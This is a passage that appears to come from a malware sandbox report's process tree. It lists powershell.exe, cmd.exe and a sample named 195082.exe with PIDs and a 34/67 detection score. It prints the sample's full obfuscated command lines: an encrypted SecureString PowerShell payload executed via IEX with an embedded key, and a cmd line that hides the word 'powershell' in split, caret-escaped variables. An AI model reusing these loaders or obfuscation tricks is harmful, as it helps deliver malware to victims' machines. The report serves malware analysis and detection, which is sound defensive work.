QA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))
(PID: 3052)
-
powershell.exe
powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))
(PID: 2096)
-
195082.exe
(PID: 2840)
34/67
- 195082.exe (PID: 3360) 34/67
-
195082.exe
(PID: 2840)
34/67
-
powershell.exe
powershell "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkADgANgBlADEANAA3ADUAYQA4ADgAYQA4AGUAMgBiAGMAOABkAGUAZQAzADUAMgAzADEANwA1ADAAOABmADcAMQAwAGUAZgA3AGMAMgA2AGYAYgA5AGQAOAA2ADkAMQBjAGMAZAAyADIAMgBiADcAMAAzADMANQA4ADgAOABkAGMAOAAxADQAZABhADQANQA3ADAAZgBhADkANwAzAGUAMQA3AGEANAAzADgAOQA0ADUAMgAwAGUAOQBhADAANwA1AGYAMAAzADcAMABjAGUAMgBjADcAMQBmADUAMwBhADIAZgAwAGYAOABiAGIAMABlAGIAYgBjADMAOQBlADQANwA3AGEAZgA2AGQAMQA3AGUAZQBmADQAYQA1AGMAMQBkADcAYgA4ADEANwAwADIANgAyAGMANwA0AGEAYgAyADIAYgBkADYAZQBlADAAYQA2ADEAZgA5AGMANQA3AGMAMgBlADQANAA2ADkAOAAxADgANgBlADAAMgAwADgAOQA0ADEAOQBhADYAMQA2AA==' |ConVerTTO-secuREStrING -KEy (146..169)) ))))
(PID: 2096)
-
cmd.exe
cmd jTEAdZpiDaiYz qjMfFiOJizKUzshGiIowLoWFqV KkWYSZzkWIXn & %C^om^S^pEc% %C^om^S^pEc% /V /c set %btHkJMzDjjiWVZK%=WYrzozjmBIwYc&&set %var1%=p&&set %var2%=ow&&set %ArQWcsLIfSRKwwT%=DWcTblEVs&&set %var7%=!%var1%!&&set %sdJUjBQbairSAth%=hrFapszPTzlTFB&&set %var3%=er&&set %var8%=!%var2%!&&set %var4%=s&&set %PnudkPBnvRAjVPb%=DdvUuuz&&set %var5%=he&&set %var6%=ll&&!%var7%!!%var8%!!%var3%!!%var4%!!%var5%!!%var6%! "iEX(( [RuNTime.InteropsErviCEs.maRsHaL]::PTrTOsTRinGAUto( [rUNtImE.iNTERoPSERVIceS.marsHAL]::SecUReStriNGTOBSTR($('76492d1116743f0423413b16050a5345MgB8AGUAQgBpAFgAawBzAGMATgBrAEgAQgBiAE4AUAB2AFUATgBPAHkAMQBuAGcAPQA9AHwAZABhAGQAMgA1ADUAMwBjAGIAMwA0ADEANABlAGQAZQA4ADEAZAA3ADIAMAA3ADYAYgA5ADcAZQA5ADgAYgA4ADMAMgAwAGEANABiAGIAZQBiADgAOAA3AGQAMgAyAGUAOQA4AGEAZABlADcAYQBlADQAYQA5AGYAZABlADQAMwBhAGYAMgAyADcANgAxADAAYgA5ADcAYgA1ADIAOQBmAGQAZQA3ADIAZABiADAAYwA5ADkAOABiAGQAMQBlADEAMgBmADkANABjADkAMgAxADAAOAA1ADkAMwBjADcAZgBlAGIAZAA4AGMAZgA2AGQAZQBiAGMANwBmADYANQA0ADIANgBmAGIANwA2ADYAZAAyADkAMQAwADUAZQA0ADMAMgA1AGIAOQBiAGEAYgA4ADgANgA3ADQAMAAzADYAYgA3AGEANwA3ADUANQA5AGUANwAxAGIAMQAyAGMAMAA0AGMAZgA4AGMANAA0AGMAYQA5ADYAYwA5AGYANQAzADMAMAA3ADQAMAA5AGMAMgA1ADUAMQAxAGEAYgA0ADIAZQBjADQAZAAzAGUAOQAxAGUANABmADYAMgA2AGIANgBmADAAMQAwADMANgA3ADkAMAAzADMAZQA5ADgANgA1AGUAMABkADQANQA3AGQANAAzADMANABmAGQAOQA1AGQAOABiADgANQBiADAAZABiAGIAMQA5ADcAOAA4ADAAZQA4AGYAMAA4ADcAMgA2ADQAOQBiAGMAYQAwADQAZQAxADkAYwBiAGYANgA4ADEANQBiADMAMgAxADkAZQBiADQAZAAxADUAOQA5AGIANgA1AGYAMwBhAGIAZgA3ADgANQBiAGEAMQAzADMAYwA0ADkANwA1ADIAOAAzADkAZQBiADAAMwAwAGQAMQA4ADEAOABlADUANgAxADAAMgA2ADAAMgAwADcANQAwADYAZgBiAGQAMQBjADcANABiAGMAOAA4ADIANwAyAGUAZAA4AGUAMwA0AGQANAAxADEAMAA2ADcAMQA3ADAAMQBkADIANAAyADEANgAzAGIAMwA1ADMAZAA4ADMANABmAGQAMQBiAGIANwBmAGQAMgAzADUAMgA4AGEANwA1ADIAZgA2ADYAYwA3ADAAOAA4AGUANwA0ADcANwBjADUAMgBlAGUAZQBhADkANwA3ADcAZQBjAGUAMAA1ADYAMQBkAGYAMABmAGMAYwBhADYAMwA2ADkAOQBlADQANQBmAGMAZAAwADMAOABjAGEAMgAzADcANQAyADQAYQA3AGIAYQA4AGUAYgA5AGIANgBlADgAZABiAGYANwA2ADYANQAyAGYANQBmAGEAZgBmAGUAMwA4ADkAYwA4ADEAZQA0AGIAMQBjADgAOAA3ADYANgBiADEANABhADYAOAA4AGUAOABjADYAOAAzAGEANwA2ADAAMQBjADEAOABjADkAOQAyAGUAYwA0ADMAOQA4ADAAMAAwAGYAOABmADYAMQA4ADgAMAA5AGMAMgAxADMANgBmADAANwBmAGUANQAzAGEAYgA3ADEAYQBlAGYAZgA0ADEAMAAwADMANgA0ADMAOQAzADMAYQA0ADkANwBmADAAMABlAGUAMQBmADAANgAyADgANAA0ADUAOQBiADQAYQA1ADkANABiAGUAZAA1AGYAOQA3ADEANAA1AGYAYQBkADYAMABkAGIAMwBhAGEAMgA3AGMAZAA1ADUAOQA3ADAAMwAwAGIAOQA3ADkAMAAxADkAZAAxADgANwBlADAAOQBlADkAOQBmADMAZAA0ADUAOQA3ADQAMAA3AGMAYwA4ADIANgA5ADAAMgBmADgAYQAxAGEANgA2AGYAMwAzADAAZQAyAGYAMQBiADIANQA2ADIANQBmAGEAZABiADQAMAA5AGUAOQA1AGEAYgBhADAAOAAyADYANgAyAGEAZQBkAGUAZgBhADYAYQBkADAAMQAyADIANgAzAGEAZABiAGUANgAyADkAYgA3ADIAZAAzAGYAMwAyADAAMwBjAGMAYQBmAGYAMgBmAGUAMQBmAGUAMAA2AGMAZABlAGUAZgBkAGQANgAxAGIAMwAyADYANQA0ADgAOAA3ADEANgAwAGIANABhAGMANABkADEAZgBlAGIANABiAGYAMABkADAAOQBhADcAMABlAGQAYgAyAGQAMAAwAGIAOQAxADcAMgBlAGIANQAxADcAOAAyADQANQA4ADMAYgA5AGIAZAA4ADAAMgBiADgAYwBhAGYAMgAxADYAMQA4ADkAYwA5ADEANwBhADEANgA2ADcAYgBjADUAOAAxADUAYQBkAGMAYwAyADgAZQAxAGUAZQBiADQANgBhADUANABlAGQAYwA1ADMAZgA1ADcANAA1ADEAMQA1AGUAZgAyAGQAYgAzADUANgBmADUAYgAxADYANwAxADcANQA2AGIAMgA5AGYAMwA5ADQAMABmADkANgA1ADgAZQA4ADcAMgBkADMAYgAzAGUAOABiADUAOQBiADMAYgAzADMAYgBjADMAYgBjADMAYQAzAGQAOQA4ADUAOAA4ADgAMAAzADYAYwAyADUANgA3ADcAYQA3AGEANgAzAGUAMQBhADAAZABhAGMAZQBjAGYANQA5ADUAYwA0AGQAYQAyADEAZABiAGMAMQBiADcAMwA3ADYAYwAyADIANAA5AGEAMQAzAGYAZgAzADYANAA2AGIAMgBjAGYAZQBlADkAMQA3ADcAYwBmADgAZQA1ADIAYgA3ADQAZAA2ADgANQA4ADAAMwAxADMAYwBjADAAOQAxADAAOQAwAGMANwAxADkAOQA2ADkAMgBlAGMAZgA3AGMAMgBmADcANwA3ADYAOQAxADAAMAAzADkAMwAzADkAZgA1AGUAYgBkADUAOQA1ADAAYgA1ADQAOAA2AGQAMABhADMANAA3ADMANQA0ADAANwA0ADIANwAxADkAMgA1AGUANABhAGMAYgAyADQAYgA1AGIAYQAzADcAZgA1ADIAOABkAGIAYgA0ADEAOAA3AGUAZgBmAGYAYgAyADQAYwA0ADUAZQBjADgAYwA0ADUAOABjADcAYwBkADMAZgA5ADcAZgBlADcANAAyADIAZgA4AGQANQA4AGUAOQBhADIAOAA0ADgANgA0ADIAMQA2AGQAYwAwAGIAMwA0AGQAZgBlAGUAYwBlAGUAYQAyAGQAZQA2ADUAZgA1ADcANAAyAGUANwAwADYANgA5ADYANwBkAGMAZAAzAGYANQBjADUAMABhADMAMQBkADYAMwAyADMAYwBiADAAMQBiAGYAYgA3ADMAYQA2AGMANAA1AGEAMQAyADgANQA5AGUAMQA4ADYAOABlADkAYwA1ADMAMwA2ADIAMQA1ADIAYwAxAGYAZQA2ADYAZABlAGEAMAA1AGEAYgAzAGUAZAA3AGYAYgBkAGIANAAwAGYAZABmAGMAZAAzADgAYgAxADEAMgA4AGIAYwA1ADMAMgA5AGQANQAyAGUAMQA2ADAAMwA3AGQAMgBmAGYAOABiAGIAYQA2ADcAMwAzADAAZAAxADEAZgAxADgAOQBhAGIAZgBlADkAYwAwADIAMQA2ADcAMgA5ADkANQBhADcAYgA4ADUAZABhADkAMAA4ADkAOQA0ADUAOQBmADcAMgA3ADMAYwAzADIANQBiADMAZABlAGQANAA5ADgAMABmAGYAZQBiAGYANwAzAGUAZABhAGMAMgA1AGEAYgA1ADMAOAA1ADUAYwAyAGIAMwA3ADIANwA5ADEANAA1ADIAOAAyAGYAOAA5ADgAMQBhADEAYgAzADMANQBmADAAOQAwADMAZgAxAGIAZAA2ADQAYQA4ADIANQBkADMAZgBlADgAZgBlADQANAA4ADMAZQAyADQAMQA1ADIAYQBiAGMANgA4ADQAYwBhADkAZABmADEAOAAxADEAYwAzADQAMgA4ADcAOAAwADAAOAA1ADQAMAA2ADEAYQBjAGUAYwBjADMAZgA2ADkANQA2ADIAYQBlADIAZAAwADMANQA0ADYAYwA3ADIAMwA1AGYANABhADYAOQBmADIAYQBhADUAMgBiADgAZABmADgAYQA2ADQAMwAxAGQAMAA3ADYAMgAxADEAYgBiADUAYQA1AGYAOAAzADQANwAwADUAZgBiAGYANQBhADEAMABlADIAYwBmADEAMwA2ADAANQAxADAAMQBmAGQAZAAxADYANwBiADIAMQBlADIAYQAyAGIAYQBiAGIAMAA2ADIAYgA1ADIANwBmAGUAYgA4ADkANgA4ADEAYgBkAGQANAAxADMAMABhAGMAOABiAGYAMwAxAGMAZQBiADkAMgBhADEAOQBhADAAZQBmAGMAOQA2AGEAZgAwAGYANQBkAGMAYQA0AGYANgAwAGMAYgA0AGMAMwBlAGIANwBmADQAMAA2ADAANgBlADYAOQBjADUAYQA2ADgAMgA5ADUAYwBmADAAYwA5ADIAYwA0ADcAYwA4ADYAOQBlADEAMgAxAGEAZAAxAGQANwA4AGQAYgAwAGIAMwBkADQAYgA3ADUAZAAwADcAYQA3ADAAYQAyADYAOAA5AGMAYgBiAGYAMwA2AGUAYwAzADIAZQA2ADIAMgA3AGQAYwAyAGEAOQAyADcANwAyADUAYQA5ADkAYwBkA